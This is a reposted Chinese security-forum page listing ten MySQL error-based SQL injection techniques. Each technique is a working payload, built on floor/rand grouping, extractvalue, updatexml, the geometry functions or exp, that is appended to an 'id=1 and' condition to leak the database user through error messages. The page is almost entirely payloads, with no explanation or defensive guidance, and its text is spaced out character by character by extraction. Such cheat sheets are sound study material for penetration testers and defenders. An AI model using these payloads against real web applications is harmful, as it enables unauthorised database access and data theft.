[20767] 2017-06-02_十种MySQL报错注入

文档创建者:s7ckTeam
浏览次数:2
最后更新:2025-01-18
2017-06-02_十种MySQL报错注入 M y S Q L L e m o n S e c   2 0 1 7 - 0 6 - 0 2 1 . f l o o r ( ) s e l e c t   *   f r o m   t e s t   w h e r e   i d = 1   a n d   ( s e l e c t   1   f r o m   ( s e l e c t   c o u n t ( * ) , c o n c a t ( u s e r ( ) , f l o o r ( r a n d ( 0 ) * 2 ) ) x   f r o m   i n f o r m a t i o n _ s c h e m a . t a b l e s   g r o u p   b y x ) a ) ; 2 . e x t r a c t v a l u e ( ) s e l e c t   *   f r o m   t e s t   w h e r e   i d = 1   a n d   ( e x t r a c t v a l u e ( 1 , c o n c a t ( 0 x 7 e , ( s e l e c t   u s e r ( ) ) , 0 x 7 e ) ) ) ; 3 . u p d a t e x m l ( ) s e l e c t   *   f r o m   t e s t   w h e r e   i d = 1   a n d   ( u p d a t e x m l ( 1 , c o n c a t ( 0 x 7 e , ( s e l e c t   u s e r ( ) ) , 0 x 7 e ) , 1 ) ) ; 4 . g e o m e t r y c o l l e c t i o n ( ) s e l e c t   *   f r o m   t e s t   w h e r e   i d = 1   a n d   g e o m e t r y c o l l e c t i o n ( ( s e l e c t   *   f r o m ( s e l e c t   *   f r o m ( s e l e c t   u s e r ( ) ) a ) b ) ) ; 5 . m u l t i p o i n t ( ) s e l e c t   *   f r o m   t e s t   w h e r e   i d = 1   a n d   m u l t i p o i n t ( ( s e l e c t   *   f r o m ( s e l e c t   *   f r o m ( s e l e c t   u s e r ( ) ) a ) b ) ) ; 6 . p o l y g o n ( ) s e l e c t   *   f r o m   t e s t   w h e r e   i d = 1   a n d   p o l y g o n ( ( s e l e c t   *   f r o m ( s e l e c t   *   f r o m ( s e l e c t   u s e r ( ) ) a ) b ) ) ; 7 . m u l t i p o l y g o n ( ) s e l e c t   *   f r o m   t e s t   w h e r e   i d = 1   a n d   m u l t i p o l y g o n ( ( s e l e c t   *   f r o m ( s e l e c t   *   f r o m ( s e l e c t   u s e r ( ) ) a ) b ) ) ; 8 . l i n e s t r i n g ( ) s e l e c t   *   f r o m   t e s t   w h e r e   i d = 1   a n d   l i n e s t r i n g ( ( s e l e c t   *   f r o m ( s e l e c t   *   f r o m ( s e l e c t   u s e r ( ) ) a ) b ) ) ; 9 . m u l t i l i n e s t r i n g ( ) s e l e c t   *   f r o m   t e s t   w h e r e   i d = 1   a n d   m u l t i l i n e s t r i n g ( ( s e l e c t   *   f r o m ( s e l e c t   *   f r o m ( s e l e c t   u s e r ( ) ) a ) b ) ) ;
1 0 . e x p ( ) s e l e c t   *   f r o m   t e s t   w h e r e   i d = 1   a n d   e x p ( ~ ( s e l e c t   *   f r o m ( s e l e c t   u s e r ( ) ) a ) ) ;
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则